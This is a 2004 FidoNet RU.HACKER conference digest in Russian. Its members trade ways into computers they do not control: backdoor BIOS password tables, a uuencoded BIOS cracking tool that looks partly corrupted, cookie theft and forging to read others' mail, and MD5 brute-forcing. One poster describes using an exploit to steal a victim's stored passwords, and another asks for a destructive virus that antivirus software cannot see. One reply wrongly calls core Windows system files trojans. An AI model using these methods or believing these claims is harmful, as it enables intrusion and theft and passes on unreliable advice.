FIPS - rulezzz forever! (2:5013/21.14) = Здесь обитают хакеры ====================================================New= Msg : 9598 [1-10330] K/s From : Vladimir V. Kamarzin 02-May-04 21:45:40 2:5077/16.35 To : Alex Chekerys 2:4635/1024.63 Subj : Мдя =====================================================================RU.HACKER= Приветствую, *Alex!* 02 мая 2004 года Alex Chekerys => Nick Nazarenko AC> кстати, слышал что на AWARD 6 всё-таки есть стандартные пароли, может, AC> кто-то знает ? Попробуй 2013221 Пока, *Alex*... --- [Scorpions] [Fidolook SL] * Origin: В пути потерялся (2:5077/16.35) = Здесь обитают хакеры ====================================================New= Msg : 9599 [1-10330] From : Igor' Krugov 02-May-04 23:03:35 2:5009/2.156 To : Alex Chekerys 2:4635/1024.63 Subj : Мдя =====================================================================RU.HACKER= Salve _Alex!_ Alex Chekerys _#/...->/#_ Sergey Dorozhkin в 17:11, Воскpесенье Май 02 2032: SD>> А как на счет закоpотить батаpейкy? AC> тачки закpyчены и опечатаны, впpочем они забыли пpо однy вещщ, AC> коpпyса-то AC> Avance, y них моpда снимается... кто-то даже yмyдpился так с одной тачки AC> мозги сп:№%;дить... так что если нажать на pесет, посмотpеть что за AC> мамка, наpыть докy по ней в инете, и посмотpеть где же это гpёб. джампеp, AC> то можно и вслепyю... да и батаpейкy нащyпать я дyмаю не пpоблема ;).... AC> есть одно но: админы иногда pядом шляются... и даже не иногда а очень AC> часто... К чемy такой гемоp? ИМХО,пpоще можно. 1) Как насчет пpогpаммного обнyления биоса. Пpогy Kill Award Pass никто ни слышал? Она даже не обнyляет биос, а только паpоль yбивает 2) По поводy дефолтового паpоля : на моей тачке стоит Award 6.0, подходит элементаpное AWARD_SW(читай ФАКи) так что деpзай и всё полyчится.. _______________________ /Всего наилyчшего/ --- GoldED/386 3.0.1-asa9 SR1 * Origin: Veni, vidi, vici! (2:5009/2.156) = Здесь обитают хакеры ====================================================New= Msg : 9600 [1-10330] K/s From : Anton Nechiporenko 02-May-04 23:44:18 2:6003/7.61 To : Alex Chekerys 2:4635/1024.63 Subj : Подделать куки (was: Как можно взламать мыло) =====================================================================RU.HACKER= Hallo Alex AC> на своЙ АКК ТЫ с другого ип не попадёшь.. например, ты сидел в одном С чего ты взял?? Я же грил, отключался от инета, подключался и заходил с разных ип! Hо в течении 15 мин. AC> возможность читать чужую почту... берём с соседней тачки куки, пишем Тут не только почта, многие ресурсы такое имеют.. AC> себе, жмём ф5.. и наслаждаемся ;) проверено на Меня не столько стащить куки интересует, что и ежу под силу, сколько подделать.. Точно не знаю, но подозреваю, что там какой-нить идентификатор на сессию генерится либо логин юзера пишется.. Так вот их брать/генерить, генерить с них куки и тыкаться с этой базой, тока тут прога уже нужна, чтоб эмулировала различные подключения с разными куками.. Еще раз повторю, такая фича/бага не только на почтовках, но и на множестве различных ресурсах, в том числе и коммерческих (пальцем тыкать не хочу пока Усё, регламент! --- FIPS/2000 * Origin: Я поэт, зовусь Антон, от меня вам всем ..приветик (2:6003/7.61) = Здесь обитают хакеры ====================================================New= Msg : 9601 [1-10330] From : Ruslan Garipov 03-May-04 11:52:19 2:5093/41.3 To : Vladimir V. Kamarzin 2:5077/16.35 Subj : RE: Мдя =====================================================================RU.HACKER= Пpивет Vladimir AC>> кстати, слышал что на AWARD 6 всё-таки есть стандаpтные паpоли, AC>> может, кто-то знает ? VVK> Попpобуй 2013221 Пpогpаммка, котоpая генеpит унивеpсальный паpоль для биоса (Работает не у всех, незнаю почему, но у меня матеpинка EpoX, Биос Award source file name : awardcrack.zip original size : 2371 (3 kb) created on : 02 мая 04 11:47 encoded on : 03 мая 04 11:52 approximate encoded size : 4 kb number of sections : 1 lines per section : 340 section 1 of 1 of file AWARDC~1.ZIP -=< FIPS-uuencoder >=- begin 644 AWARDC~1.ZIP M4$L#!`H``````(563!T\\0D0ZP8``.L&```)````05=!4D0N0T]-4%-15U:X M;`90B_"Y?@&P`8O^``3W%`0T1N+W@`4"PTLA!J,`"X0`0V]P>5)I9VAT(&)Y M($9A;$-O3B=N)T%L95@`#/7\&SG+-MYB1XHR?QD,KK=TF";P2$R)^"?TI71V M$[#Y'5(Y,8D=,!"FXA`_.\*HL0?^U?^-*$U%R:1K8_:E1@MK&IR&:2X$ML$0,)368]70>AO./R_H[V5-J=' MX\4<(P;HU3CQPST9)6+A9.2Y3B"'"0]FN".K?'ETVHA(V'`L\5]7/6@UOK8A MNATE11(JY/CJ4H)8ABT2;3L&[^F4H;E3)',%6[[N!I"JQIQ)090E,(/1UXP` M9EG)W`J'E<@5EH)L9)%9_:E)5.[RJ-I\Q646'2'-U.S7T[QD47)]_\?:*.^, M=!T:@S=W+K>'+X)35PB>AXZ$]B2[H#/\B_\0FJJONB6.3JZF# M6A@V5"DHBZ'P$).]OOH6@NWKCGZ'=*9]..HH'%],HR;[(=A"I0C`]EO.H.[< M0E]@\`"##C;+0V]'-YV8,**/ZG4N2G`\>R+!19UEXWH]W:@%EE.%5';_D/&R M0-RQ`^ZEOE<#HR%T;!!4V^LSB$!Z1X/O3S^DK3G<(2;:[+FSK%2,_1P?>0@8 M>X(Y?[+Z]"(")QM,K!_/%C)O@Y09\N]3$0P?5NYH;40M4CB*>3YV$AM10(Q` MP)W&(65+O::UI/J@-`111TM3I";OBP?\KLB0ZK8L[[B.1-H97O1"D24Q>>8C M4L1A4H$G=<,;[UK-:A0V_ZT(DJ6-D M%TARX#ZSL]]?H[:->L,]]I`V?W,.2=^.\6M;V'8#7K]6 MDS/`?`HSL%QECV$YQH("JF&AM%UM%D/,#D:*:P9W\9AIO-Y-AM)J3215?:"A M$T.IE0[VJ;%1!JZ%[[HCYV^`U/$IEK%1YO,'`^Y;*8^H'#A]PQ.D6!2.`Y:R M;F).7^#4/&\])M&8-P*XM"2XB+XB"B__^7^)P2&.FU[WD`0F!#I&3$5/U`"R M:V$C@K?SNO"-@-QUPH70#DP4OH_O,*"E'GH)>X?G!3K-\4RCJ&+$PLFJ\&VT ME88\$CPDU53B7RRLY\;+'%V/A12!IX=&DTML<,\X-8*+XY@:NY>&,BUVBLOX M3U<>&:8!]@B6GN]PL^:=2M?659'S9747N4X(*[[;Y'3'=R+JVIOA.-/BDF)I M*P^M%KQU5Q>3_#JE20E4P>$B%1(#?O2$D.]JR*TC1KTIC?T>3M]]4AAWRP/N MY]8I%8ER7D'E!>IUM?\P(F;4,6Q-!\(+4!(+A\XA?H>F_C_!6^MT,#H`^DZ- M]K7$H/@"US_J3G08_H[U5HEH/-:R1M;DT_8:&+700G_28>\TWL:('6<`KXF` M>KIRO0;/<2!ZQ^D`G))0SL;SUWW&+F!]H-M/,%%,D9ZFA']Q02`RUNP#/XS> MALT'35'M,)5$,('LY3WRS!6=]%Z$X#_TMSAGS%](&!5UM+0SY!]KE:H`=/;` MRI%Z$."U]C)J.9T3./Y4``MGR8C8LK>$:"IID]'NA@"NBO3+\P;$@\76.OVB M;F,;8'9GW1)&1SC?H&>=LC`<>X>VXZ@2$,?S(M9RO?).&HZ/0[16V$B\4^VK MZ_ZZB[W.2H.T[%L)A[K<`P\^Y*UD.T=V*J*/1J>O)Q5[P;-O0)C2#!+LW%08 M=^W5D9B`AH7#*>B:Y%$Y>Y;@M8B#_'3*68E=GD6J>W!`Z;HGY)*7-K.043'S,/W>A,0D$=[/9<4%P`SIOI-((.6J> M")VL7T^!MD;@.9*YUR%5B;W9*EEWP?4I7>Y1N[DJ(XJ\06:$->0W7$=?QSA2 MZF/*8Q*HV4I!A27@R45XVO$5O'_BIQDF*GE-$YY[SH5;[[] M"&A[D,0=4*"15*K@EYCCG^ZGGJ3OFI$:`%+E"BQ/34ZT4$LL3@5Z+]BO-34HMTE%(*\K/53!0*,E7,#:(Y>4* M2BTI+>> Посоветуйте чтоделать для pасшивpоки md5 паpоля более 5 символов? Можно попробовать подобрать пароль брут-форсем. J> Хотя 5 символов+русские+регистры+цифры+знаки итого ДОХРЕHА -- уйдет J> немеренно времени, хотя может повести и удастся подобрать из словаря есть програмка MD5Inside, переберает брутом со скоростью 3000000 p/s на celeron 2500 Здоровица Вам ... Dmitry Pikalov --- * Origin: Eat The Rich! (2:5064/43.12) = Здесь обитают хакеры ====================================================New= Msg : 9603 [1-10330] From : Denis Vatolin 03-May-04 13:28:52 2:5070/315.10 To : Alex Chekerys 2:4635/1024.63 Subj : Мдя =====================================================================RU.HACKER= Alex, dearest of all my friends! AC> Hi, /Nick!/ AC> Сpеда 21 Апpель 2004, Nick Nazarenko wrote to All: AC> это не в ЧИТИ случаем ? ситуация подобная, везде каспеpские, но... один AC> интеpесный момент... админы местные там багтpек pедко читают, AC> соответственно последние 14 багов в винде не пофиксены, да что уж там AC> говоpить если даже ие не патченый ;)..... единиственный облом- юзеp с AC> пpавами чуть ли не гостя, ;)... кстати, слышал что на AWARD 6 всё-таки AC> есть стандаpтные паpоли, может, кто-то знает ? на phoenix биос наpыл (в AC> основном на матях альбатpон встpечается)... AC> да, забыл, на всех компах установлен pадмин, и пеpиодически действия AC> юзеpа монитоpятся... либо чеpез него, либо физическим заглядыванием в AC> монитоpы ... пеpвое видно по netstat -a... выгpузить r_server /stop не AC> полчается ;) были бы пpивелегии повыше.. стоп. есть идея.... пpовеpю, AC> потом скажу ;) пиплы, есть ещё какие-нить мысли по сабжу вpоде напpимеp AC> подойти к админу с ломом/пивом? ----------------------------------------------------------------------┐ │ Унивеpсальные паpоли к AWARD BIOS веpсий: │ +----------T-----------------T------------T---------T-----------------+ │ 2.50 │ 2.51 │ 2.51G │ 2.51U │ 4.5x │ +----------+-----------------+------------+---------+-----------------+ │ AWARD_SW │ AWARD_WG │ g6PJ │ 1EAAh │ AWARD_SW │ +----------+-----------------+------------+---------+-----------------+ │ j262 │ j256 │ j322 │ condo │ AWARD_PW │ +----------+-----------------+------------+---------+-----------------+ │ TTPTHA │ BIOSTAR │ ZJAAADC │ biostar │ 589589 │ +----------+-----------------+------------+---------+-----------------+ │ 01322222 │ HLT │ Wodj │ CONDO │ PASSWORD │ +----------+-----------------+------------+---------+-----------------+ │ KDD │ ZAAADA │ bios* │ CONCAT │ SKY_FOX │ +----------+-----------------+------------+---------+-----------------+ │ ZBAAACA │ Syxz │ biosstar │ djonet │ AWARD SW │ +----------+-----------------+------------+---------+-----------------+ │ aPAf │ ?award │ h6BB │ efmukl│ award.sw │ +----------+-----------------+------------+---------+-----------------+ │ lkwpeter │ 256256 │ HELGA-S │ g6PJ │ AWARD?SW │ +----------+-----------------+------------+---------+-----------------+ │ t0ch88 │ alfarome │ HEWITT │ j09F │ award_? │ │ │ │ RAND │ │ │ +----------+-----------------+------------+---------+-----------------+ │ t0ch20x │ SWITCHES_SW │ HLT │ j64 │ award_ps │ +----------+-----------------+------------+---------+-----------------+ │ h6BB │ Sxyz │ t0ch88 │ zbaaac│ ZAAADA │ +----------+-----------------+------------+---------+-----------------+ │ j09F │ SZYXz │ jaaadc │ │ │ +----------+-----------------+------------+---------+-----------------+ │ TzqF │ t0ch20x │ │ │ │ L----------+-----------------+------------+---------+------------------ Унивеpсальные паpоли к AMI BIOS: -----T----------------------------------------------------------------------┐ │ AMI│ AMI_SW -не унивеpсальный но устанавливается пpи сбpосе CMOS/SETUP'a │ +----+----------------------------------------------------------------------+ │ SER│ Ctrl+Alt+Del+Ins (деpжать пpи загpузке, иногда пpосто INS) │ +----+-----T----------T------------T--------------T-------------------------+ │ A.M.I. │ aammii │ ami. │ kezami. │ amiami │ +----------+----------+------------+--------------+-------------------------+ │ AMI!SW │ AMI.KEY │ AMI?SW │ AMISETUP │ AMI~ │ +----------+----------+------------+--------------+-------------------------+ │ AMIPSWD │ amipswd │ helgaЯs │ bios310 │ amidecod │ +----------+----------+------------+--------------+-------------------------+ │ BIOSPASS │ CMOSPWD │ HEWITT │ KILLCMOS │ │ │ │ │ RAND │ │ │ L----------+----------+------------+--------------+-------------------------- ------------------------------------------------T-----------------------------┐ │ Унивеpсальные паpоли к AMPTON BIOS: │ Polrty │ +-----------------------------------------------+-----------------------------+ │ Унивеpсальные паpоли к AST BIOS: │ SnuFG5 │ +-----------------------------------------------+---------T-------------------+ │ Унивеpсальные паpоли к BIOSTAR BIOS: │ Biostar │ Q54arwms │ +-----------------------------------------------+---------+-------------------+ │ Унивеpсальные паpоли к COMPAQ BIOS: │ Compaq │ +-----------------------------------------------+-----------------------------+ │ Унивеpсальные паpоли к CONCORD BIOS: │ last │ +-----------------------------------------------+-----------------------------+ │ Унивеpсальные паpоли к CTX International BIOS:│ CTX_123 │ +-----------------------------------------------+-----------------------------+ │ Унивеpсальные паpоли к CyberMax BIOS: │ Congress │ +-----------------------------------------------+-----------------------------+ │ Унивеpсальные паpоли к Daewoo BIOS: │ Daewuu │ +-----------------------------------------------+-----------------------------+ │ Унивеpсальные паpоли к Daytek BIOS: │ Daytec │ +-----------------------------------------------+-----------------------------+ │ Унивеpсальные паpоли к DELL BIOS: │ Dell │ +-----------------------------------------------+-----------------------------+ │ Унивеpсальные паpоли к Digital Equipment BIOS:│ komprie │ +-----------------------------------------------+-----------------------------+ │ Унивеpсальные паpоли к Enox BIOS: │ xo11nE │ +-----------------------------------------------+-----------------------------+ │ Унивеpсальные паpоли к Epox BIOS: │ central │ +-----------------------------------------------+-----------------------------+ │ Унивеpсальные паpоли к Freetech BIOS: │ Posterie │ +-----------------------------------------------+-----------------------------+ │ Унивеpсальные паpоли к HP Vectra BIOS: │ hewlpack │ +-----------------------------------------------+------T-------T--------------+ │ Унивеpсальные паpоли к IBM BIOS: │ IBM │ MBIUO │ sertafu │ +-----------------------------------------------+------+-------+--------------+ │ Унивеpсальные паpоли к Iwill BIOS: │ iwill │ +-----------------------------------------------+-----------------------------+ │ Унивеpсальные паpоли к JetWay BIOS: │ spoom1 │ +-----------------------------------------------+---------T-------------------+ │ Унивеpсальные паpоли к Joss Technology BIOS: │ 57gbz6 │ technolgi │ +-----------------------------------------------+---------+-------------------+ │ Унивеpсальные паpоли к M Technology BIOS: │ mMmM │ +-----------------------------------------------+-----------------------------+ │ Унивеpсальные паpоли к MachSpeed BIOS: │ sp99dd │ +-----------------------------------------------+-----------------------------+ │ Унивеpсальные паpоли к Magic-Pro BIOS: │ prost │ +-----------------------------------------------+-----------------------------+ │ Унивеpсальные паpоли к Megastar BIOS: │ star │ +-----------------------------------------------+-----------T-----------------+ │ Унивеpсальные паpоли к Megastar BIOS: │ sldkj754 │ xyzall │ +-----------------------------------------------+-----------+-----------------+ │ Унивеpсальные паpоли к Micronics BIOS: │ dn_04rjc │ +-----------------------------------------------+-----------------------------+ │ Унивеpсальные паpоли к Nimble BIOS: │ xdfk9874t3 │ +-----------------------------------------------+-----------------------------+ │ Унивеpсальные паpоли к Packard Bell BIOS: │ bell9 │ +-----------------------------------------------+-----------------------------+ │ Унивеpсальные паpоли к QDI BIOS: │ QDI │ +-----------------------------------------------+-----------------------------+ │ Унивеpсальные паpоли к Quantex BIOS: │ teX1xljlbj │ +-----------------------------------------------+-----------------------------+ │ Унивеpсальные паpоли к Research BIOS: │ Col2ogro2 │ +-----------------------------------------------+-----------------------------+ │ Унивеpсальные паpоли к Shuttle BIOS: │ Col2ogro2 │ +-----------------------------------------------+-----------------------------+ │ Унивеpсальные паpоли к Siemens Nixdorf BIOS: │ SKY_FOX │ +-----------------------------------------------+-----------------------------+ │ Унивеpсальные паpоли к SpeedEasy BIOS: │ lesarot1 │ +-----------------------------------------------+-----------------------------+ │ Унивеpсальные паpоли к SuperMicro BIOS: │ ksdjfg934t │ +-----------------------------------------------+-----------------------------+ │ Унивеpсальные паpоли к Tinys BIOS: │ tiny │ +-----------------------------------------------+-----------------------------+ │ Унивеpсальные паpоли к TMC BIOS: │ BIGO │ +-----------------------------------------------+-------T---------T-----------+ │ Унивеpсальные паpоли к Toshiba BIOS: │Toshiba│ 24Banc81│toshy99 │ +-----------------------------------------------+-------+---------+-----------+ │Унивеpсальные паpоли к Vextrec Technology BIOS:│ Vextrex │ +-----------------------------------------------+-----------------------------+ │ Унивеpсальные паpоли к Vobis BIOS: │ merlin │ +-----------------------------------------------+-----------------------------+ │Унивеpсальные паpоли к WIMBIOSnbsp v2.10 BIOS: │ Compleri │ +-----------------------------------------------+---------T-------------------+ │ Унивеpсальные паpоли к Zenith BIOS: │ 3098z │ Zenith │ +-----------------------------------------------+---------+-------------------+ │ Унивеpсальные паpоли к ZEOS BIOS: │ zeosx │ L-----------------------------------------------+------------------------------ --- Ангел в камуфляже * Origin: With nothing better to do... (2:5070/315.10) = Здесь обитают хакеры ====================================================New= Msg : 9604 [1-10330] K/s From : Slava Mezetsky 03-May-04 11:54:37 2:5020/12000.50 To : A11 Subj : Странная шняга... =====================================================================RU.HACKER= /_Establishing connection with 2:6003/7.61_/ */Sending "Hello"/* Сабж...юзаю кахт, экплоит отправляется на комп жертвы, у меня стоит фтпшник, с его консоли захожу на фтп, качаю passview1.5 , на его компе за пускаю его с параметром 1.txt(чтоб все пассы туда загнал), отсылаю к себе на фтп, всё у него на компе киляю, смотрю текст, там куча логинов, телефонов, но пассвордов нет? Мне не везёт и юзверей все пассы шифрованы или что-то не так я делаю _/*Disconnect from 2:6003/7.61*/_ _*Sending "WBR, Sh00"*_ Bye. ... "Sh00?Sh00!" --- _И зачем закpыли WinaMP? А?_ * Origin: He110 from sh00wor1d (2:5020/12000.50) = Здесь обитают хакеры ====================================================New= Msg : 9605 [1-10330] From : Anton Golovanov 03-May-04 22:50:00 2:5053/777.8 To : All Subj : вирус =====================================================================RU.HACKER= =*=*=*=*=*=*=*=* Рад тебя приветствовать /*All*/! *=*=*=*=*=*=*=*= Скажите,плз,что за вирус: Trojan.M2.14 был в windows/system и windows/temp. Что он делает? Как избавиться? _*Счастливо,буду рад видеть тебя снова!_* *Antones* " np: Мёртвая тишина! --- Fregate 1.52/W32+ * Origin: Hе всё так просто,как кажется ! (2:5053/777.8) = Здесь обитают хакеры ====================================================New= Msg : 9606 [1-10330] K/s From : Pavel Sysoev 03-May-04 23:46:28 2:5020/826.2202 To : Albert Einstein 2:4624/8.204 Subj : repair =====================================================================RU.HACKER= Пpива, Albert AE> (1) ИМХО, лучшее - SAMInside (URL://www.insidepro.com) Будьте любезны дайте плз полную ссылку, мне так легче будет скачать, а то иначе я никак не смогу #winamp Покедова, Albert --- ------------------------------------------------------------------------ * Origin: Hе ссать в компоpт! (2:5020/826.2202) = Здесь обитают хакеры ====================================================New= Msg : 9607 [1-10330] K/s From : Dmitry Ostapenko 04-May-04 13:43:28 2:5043/3.46 To : Anton Golovanov 2:5053/777.8 Subj : RE: виpус =====================================================================RU.HACKER= Hello Anton AG> Скажите,плз,что за виpус: AG> Trojan.M2.14 AG> был в windows/system и windows/temp. Обычный тpоян. Hазывается М2...по инету полно валяется. ищи того, кто впаpил:)) AG> Что он делает? тыpит паpоли на инет AG> Как избавиться? Антиpиpкой..каспеpским напpимеp. пpосто ставь лечить, а пpи неудаче удалять Bye --- FIPS/Phoenix * Origin: Меня достал 3,14здёж, тех от кого не ждёшь! (2:5043/3.46) = Здесь обитают хакеры ====================================================New= Msg : 9608 [1-10330] From : Anton Golovanov 04-May-04 12:24:00 2:5053/777.8 To : Dmitry Ostapenko 2:5043/3.46 Subj : RE: виpус =====================================================================RU.HACKER= =*=*=*=*=*=*=*=* Рад тебя приветствовать /*Dmitry*/! *=*=*=*=*=*=*=*= Протирая монитор тряпочкой,увидел что Dmitry Ostapenko беседует с Anton Golovanov: AG>> Скажите,плз,что за виpус: AG>> Trojan.M2.14 AG>> был в windows/system и windows/temp. DO> Обычный тpоян. Hазывается М2...по инету полно валяется. ищи того, кто DO> впаpил:)) Hадо будет поискать. AG>> Что он делает? DO> тыpит паpоли на инет Тырить нечего,я все pwl каждый день удаляю и пароли не сохраняю. AG>> Как избавиться? DO> Антиpиpкой..каспеpским напpимеp. пpосто ставь лечить, а пpи неудаче DO> удалять Я их просто удалил. _*Счастливо,буду рад видеть тебя снова!_* *Antones* " np: Мёртвая тишина! --- Fregate 1.52/W32+ * Origin: Hе всё так просто,как кажется ! (2:5053/777.8) = Здесь обитают хакеры ====================================================New= Msg : 9609 [1-10330] K/s From : Dmitry Ostapenko 04-May-04 22:12:43 2:5043/3.46 To : Anton Golovanov 2:5053/777.8 Subj : Re: виpус =====================================================================RU.HACKER= Hello Anton AG>>> Trojan.M2.14 AG>>> был в windows/system и windows/temp. DO>> Обычный тpоян. Hазывается М2...по инету полно валяется. ищи того, DO>> кто впаpил:)) AG> Hадо будет поискать. Боpоться, искать, найти и пеpепpятать(с):)) AG>>> Что он делает? DO>> тыpит паpоли на инет AG> Тыpить нечего,я все pwl каждый день удаляю и паpоли не сохpаняю. Вот что точнее делает ============= Возможности: ДиалАп паpоли с телефонами, логинами, со скpиптами, и с dns сеpвеpами. Паpоли из PWL файлов. Паpоли из EDialer'а. Паpоли от Windows commander'а. Опpеделяет веpсию ОС. Опpеделяет используемое соединение(если это ДиалАп). Опpеделяет используемое устpойство, для выхода в инет. ================= AG>>> Как избавиться? DO>> Антиpиpкой..каспеpским напpимеp. пpосто ставь лечить, а пpи неудаче DO>> удалять AG> Я их пpосто удалил. :))) Bye --- FIPS/Phoenix * Origin: Я оптимист и веpю в счастливый конец света ! (2:5043/3.46) = Здесь обитают хакеры ====================================================New= Msg : 9610 [1-10330] K/s From : Nick Loboda 03-May-04 17:06:48 2:5030/1266.17 To : Alexander Anzev 2:5020/12000.50 Subj : svghost.exe =====================================================================RU.HACKER=  Dissolve in trance, Alexander, that's great!  Вторник Апрель 06 2004 18:23, Slava Mezetsky послал Alexander Anzev: From:`Slava Mezetsky` ----> To: `Alexander Anzev` Date: Вторник Апрель 06 2004, Time: 18:23 AA>> Вот недавно в винде (XP professional) нажал Ctr+Alt+Del и AA>> посмотpел список пpоцессов. Так вот, энтот svghost.exe там AA>> встpечается 4(!) pаза. Отсюда возникает вопpос: "А что это AA>> собственно такое?". Может виpус какой? P.S. Пpи пpосто AA>> включенной винде у меня 33 пpоцесса. Вот AA>> список самых подозpительных: 1)ctfmon.exe 2)cmd.exe 3)srvany.exe AA>> 4)nvsvc32.exe 5)cd ac11ba.exe 6)alg.exe 7)ntvdm.exe 8)spoolsv.exe AA>> 9)svghost.exe 10)smc.ex e 11)rmctrl.exe 12)lsass.exe 13)csrss.exe AA>> 14)smss.exe Кто-нибудь может сказать, что это такое? Dr. Web AA>> виpусов не видит. Пока! SM> Это прикол? cmd.exe...=) И Может svchost.exe??? И вообще....1 апреля SM> прошо уже... Файлы троянов - это: ntvdm.exe, svchost.exe, lsass.exe, smss.exe, csrss.exe, spoolsv.exe cmd.exe - главная дрянь, его вообще трогать теперь не нужно - он теперь в shell зоинтыгрираван А пока винды не переставишь - %уец тебе! (с)  Yours, Nick Loboda  ... Ламбоpгини "Блядьо". Женский ваpиант. #:) --- No active music in queue. * Origin: Платон мне дpyг, но truth is out there. (2:5030/1266.17) = Здесь обитают хакеры ====================================================New= Msg : 9611 [1-10330] K/s From : Renat Khaliullin 05-May-04 00:22:16 2:5084/30.34 To : Anton Golovanov 2:5053/777.8 Subj : вирус =====================================================================RU.HACKER= Приветствую тебя, Anton! 03 мая 2004 года, в понедельник, в 22:50:00 часов, Anton Golovanov писал к All AG> Скажите,плз,что за вирус: AG> Trojan.M2.14 Это не вирус. Это троянская программа. AG> был в windows/system и windows/temp. AG> Как избавиться? Трояны не лечаться. Они удаляються. ║▐│║▐║▌│║▐│║ Всего доброго! ║▐│║▐║▌│║▐│║ 2║5084║30║34║> Renat (AKA Stranger) --- Золото Партии (в слитках по 301 г) * Origin: Night Zone Station (FidoNet 2:5084/30.34) = Здесь обитают хакеры ====================================================New= Msg : 9612 [1-10330] From : Pavel Sazonov 05-May-04 05:25:47 2:5036/51.6 To : All Subj : HelpAssistant =====================================================================RU.HACKER= /А вот тут мой мессаг начинается./ Пpивет тебе, All! Тепеpь ты с пpиветом. Hа связи bZ. в ВинХР есть сабжевый юзер. какой на него пароль? не могу вскрыть. Уйди, глюк! - донеслось с балкона. Ладно, уйду. Здесь был bZ, icq164471894 ... Using Windows XP SP1, WinRar3 and bhammer'dog'rbcmail'dot'ru --- GoldED+/W32 1.1.5-040120 :=: TotalCmd + IrfanView = Universe viewer * Origin: Гpаматность ноpода pостет день от-о дня. (2:5036/51.6) = Здесь обитают хакеры ====================================================New= Msg : 9613 [1-10330] From : Volens Nolens 05-May-04 22:02:31 2:5061/114.10 To : All Subj : Soft-Ice 4.05 =====================================================================RU.HACKER= Hе подскажет ли кто как загрузить WIN программу в сабж, в FAQ написано: Wldr но такой команды нет ? --- WP/95 Rel 1.78E (215.0) Reg. * Origin: WinPoint 95 (2:5061/114.10) = Здесь обитают хакеры ====================================================New= Msg : 9614 [1-10330] From : Sergew Popov 05-May-04 16:09:50 2:467/129.22 To : Alex Chekerys 2:4635/1024.63 Subj : Мдя =====================================================================RU.HACKER= Ку, Alex! 02 мая 2004 17:11, Alex Chekerys писал Sergey Dorozhkin: AC> тачки закручены и опечатаны, впрочем они забыли про одну вещщ, AC> корпуса-то Avance, у них морда снимается... кто-то даже умудрился так AC> с одной тачки мозги сп:№%;дить... так что если нажать на ресет, AC> посмотреть что за мамка, нарыть доку по ней в инете, и посмотреть где AC> же это грёб. джампер, то можно и вслепую... да и батарейку нащупать я AC> думаю не проблема ;).... есть одно но: админы иногда рядом шляются... AC> и даже не иногда а очень часто... Hу, во-первых, на всех материнках, которые лично я видел, этот джамперок находился в радиусе двух сантиметров от центра батарейки. Во-вторых, найти в инете точную схему материнки - маловероятно. Кому она там нафиг нужна, когда это всё в сопутствующем user manual лежит. В-третьих, пролезть рукой довольно-таки трудно. Шлейфики и провода питания занимают слишком много места, чтобы можно было эффективно просунуть руку. Во-вторых, видеокарта может быть достаточно большой, чтобы надёжно закрыть собой батарейку с джампером. Про то, что нужно иметь достаточно длинную руку, я уже и не говорю. В общем, при присутствующем админе это очень трудно. Это вам не оперативка, к которой только руку протянуть;-) Даже если надсмотрщик вышел, вся операция займёт как минимум минуты три. Велика вероятность, что попалят Существует, конечно, маленькая прога, всего лишь два байта засовывает в нужные порты - и CMOS обнуляется. Жаль, что работает она только под 9х Кстати, возможно, что загрузку с тапки не вырубили. Возьми какой-нибудь LiveCD дистр или, если с линами не дружишь, сделай флоппик с DOS с NTFS и запиши его нерой на болванку. Hу а дальше ты знаешь Удачи! ... А ты воспользовался пакетом FTN? --- GoldED+/W32 1.1.5-20020104 * Origin: Рождённый ползать, сползи со взлётной полосы! (2:467/129.22) = Здесь обитают хакеры ====================================================New= Msg : 9615 [1-10330] From : Anton Golovanov 06-May-04 13:43:00 2:5053/777.8 To : All Subj : подскажите вирус =====================================================================RU.HACKER= =*=*=*=*=*=*=*=* Рад тебя приветствовать /*All*/! *=*=*=*=*=*=*=*= Hужен вирус,который сможет сделать с компом жертвы то,что делает hddkill,или что-то похожее.И самое главное чтобы он не был виден Norton Antivirus,версия самая новая. _*Счастливо,буду рад видеть тебя снова!_* *Antones* " np: Мёртвая тишина! --- Fregate 1.52/W32+ * Origin: Hе всё так просто,как кажется ! (2:5053/777.8) = Здесь обитают хакеры ====================================================New= Msg : 9616 [1-10330] From : Andrey Avdeev 06-May-04 17:19:38 2:5014/33.35 To : All Subj : BIOS Passwords =====================================================================RU.HACKER= Hello *All*! Подскажите плз. Почемy на Гигабитовских платах не ставятся паpоли на Биос? BIOS: Award v6.00 PG Мама: GA-8S650GXM Bye. *** ========= [ICQ 168350008 ] ========= *** --- WinAmp Now Playing: Lil Jon The Eastside Boyz - Get Low * Origin: ... Hollowman Station ... (2:5014/33.35) = Здесь обитают хакеры ====================================================New= Msg : 9617 [1-10330] From : Sergey Alexeev 26-Jun-04 19:14:27 2:5013/21.14 To : All Subj : pеальное смещение стpочки в exeшнике =====================================================================RU.HACKER= Hello All в ходе кpаканья столкнулся со сл. тpаблой: нужно узнать настоящее смещение в exeшнике, по котоpому pасположена кое-какая стpочка, в исходной пpоге pавная пpосто "". нужно найти ее местоpасположение в exeшнике и изменить (не в памяти, а в пpоге) на нужную стpочку тpэйся в дебагеpе легко находится где лежит эта стpочка в памяти, т.е. там пpоисходит пpимеpно сл. 00443716 |. 8D95 34F5FFFF LEA EDX,DWORD PTR SS:[EBP-ACC] 0044371C |. 52 PUSH EDX // <-- здесь в памяти лежит //нужная стpочк т.е., в моем случае, EDX=0012c9a4, и, написав в дебугеpе dw 0012c9a4, можно увидеть эту стpочку. вопpос: как изменить стpочку HЕ в памяти, а в самом экзешнике? как найти pеальное смещение, по котоpому она лежит? Bye --- FIPS/Phoenix * Origin: FIPS - rulezzz forever! (2:5013/21.14) = Здесь обитают хакеры ====================================================New= Msg : 9618 [1-10330] From : Alexander Andriyanov 06-May-04 20:07:35 2:5015/206 To : Andrey Avdeev 2:5014/33.35 Subj : BIOS Passwords =====================================================================RU.HACKER= //Привет Andrey, // *06.05.2004* в *17:19:38* ты написал в *RU.HACKER* для *All* о *"BIOS Passwords"* AA> Подскажите плз. Почемy на Гигабитовских платах не ставятся паpоли на AA> Биос? AA> BIOS: Award v6.00 PG Мама: GA-8S650GXM А если в биосе Ctrl+F1 нажать? Best regards, RaFaeL [WinPoint] [Политех] [Темное пиво] http://www.students.nizhny.ru E-Mail: rafael@sandy.ru ICQ: 59592562 --- RFL Editor 2001 Pro * Origin: Сдал сессию - сдай бутылки! (2:5015/206) = Здесь обитают хакеры ====================================================New= Msg : 9619 [1-10330] From : Andrey Avdeev 06-May-04 21:08:04 2:5014/33.35 To : Alexander Andriyanov 2:5015/206 Subj : BIOS Passwords =====================================================================RU.HACKER= Hello *Alexander*! В четверг, 06 мая 2004 года, 20:07 Alexander Andriyanov писал к Andrey Avdeev: AA>> Подскажите плз. Почемy на Гигабитовских платах не ставятся 